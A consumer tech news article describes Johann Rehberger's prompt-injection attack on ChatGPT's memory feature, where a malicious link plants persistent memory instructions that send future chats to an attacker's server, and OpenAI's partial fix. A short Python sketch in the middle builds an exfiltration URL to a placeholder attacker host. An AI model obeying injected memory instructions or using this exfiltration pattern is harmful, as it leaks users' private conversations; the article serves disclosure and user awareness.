As a longtime ChatGPT user, I want AI chatbots to be very secure and private. That is, I want the contents of my chats to be protected from would-be attackers and from OpenAI itself. OpenAI can of course use chats to train future models if you allow it, but I don’t.
While I have to trust that OpenAI handles the security and privacy aspects of the ChatGPT experience, I also know that other ChatGPT enthusiasts will test everything that’s possible with the chatbot. In the process, they can potentially identify serious security issues.
Such is the case with security researcher Johann Rehberger, who developed a way to exploit the ChatGPT memory feature to exfiltrate user data. The researcher fed ChatGPT a prompt that wrote permanent instructions to the chatbot’s memory, including directions to steal the user’s data from all new chats and send the information to a server.
That sounds scary, and it is. But it’s also not as dangerous as it might seem at first, because there are several big twists. And before I even describe the exploit, you should know that OpenAI has already fixed it.
For the exploit to work, hackers would first have to convince you to click a malicious link to kickstart the process. That’s the same opening move as in plenty of other attacks that have nothing to do with generative AI chatbots: convincing the target to click on a link.
Assuming the hackers convince you to load a link in ChatGPT, a prompt delivered through it can write instructions to the chatbot’s memory telling the AI how to exfiltrate information from all the chats that follow. However, the prompt injection only works if you use the macOS version of ChatGPT; the memory can’t be tampered with this way through the website.
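To give a rough sense of the mechanics, here’s a minimal Python sketch of the general exfiltration pattern such an attack relies on: conversation text gets packed into a URL pointing at an attacker-controlled server, and the data leaks the moment that URL is fetched. The domain, path, and parameter names below are placeholders I made up for illustration, not details from Rehberger’s actual payload.

```python
# Conceptual sketch only: shows how chat text could be smuggled out inside a
# URL pointing at an attacker-controlled server. The domain, path, and
# parameter names are hypothetical, not taken from Rehberger's proof of concept.
from urllib.parse import quote

ATTACKER_SERVER = "https://attacker.example"  # placeholder, not a real server

def exfiltration_url(chat_text: str) -> str:
    """Encode conversation text into a query string on the attacker's URL."""
    return f"{ATTACKER_SERVER}/log?data={quote(chat_text)}"

# Every time the client fetches such a URL, the server's access logs
# receive the encoded conversation text.
print(exfiltration_url("user: here are my vacation plans..."))
# -> https://attacker.example/log?data=user%3A%20here%20are%20my%20vacation%20plans...
```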
Assuming you click on the malicious link and you’re using the Mac app, you can even ask ChatGPT to explain what the link is about, as you’ll see in the proof-of-concept video at the end of this post. The chatbot will most likely fail to tell you that it’s now spying on your chats for a third party. Here’s the final twist: you still control the memory.
OpenAI introduced the ChatGPT memory feature earlier this year to improve your conversations with the chatbot. You can instruct ChatGPT to remember certain things, but you stay in control: you can tell the AI to forget something or erase the entire memory. The feature is also optional, so you can deactivate it entirely.
If you think hackers might have messed with your ChatGPT memory, you can always check it and delete anything you want. Once the injected entries are gone, the chatbot will stop sending your conversations to an attacker, which is the scenario Rehberger demonstrated.
According to Ars Technica, Rehberger reported the ChatGPT vulnerability to OpenAI earlier this year. The company initially labeled it a safety issue rather than a security concern. The researcher then went further and created the proof of concept shown in the video below. This time, OpenAI engineers paid attention and issued a partial fix.
The fix makes it impossible for ChatGPT’s memory to be abused as an exfiltration vector, so attackers won’t be able to steal the contents of your chats after duping you into clicking on a malicious link. However, the hack still shows that attackers might try to inject memories into the ChatGPT conversations of unsuspecting users.
In the future, you should periodically review the ChatGPT memory feature to ensure that the chatbot only remembers what you want.
The video below shows Rehberger’s attack in action. More information about this ChatGPT memory hack is available on Rehberger’s blog at this link.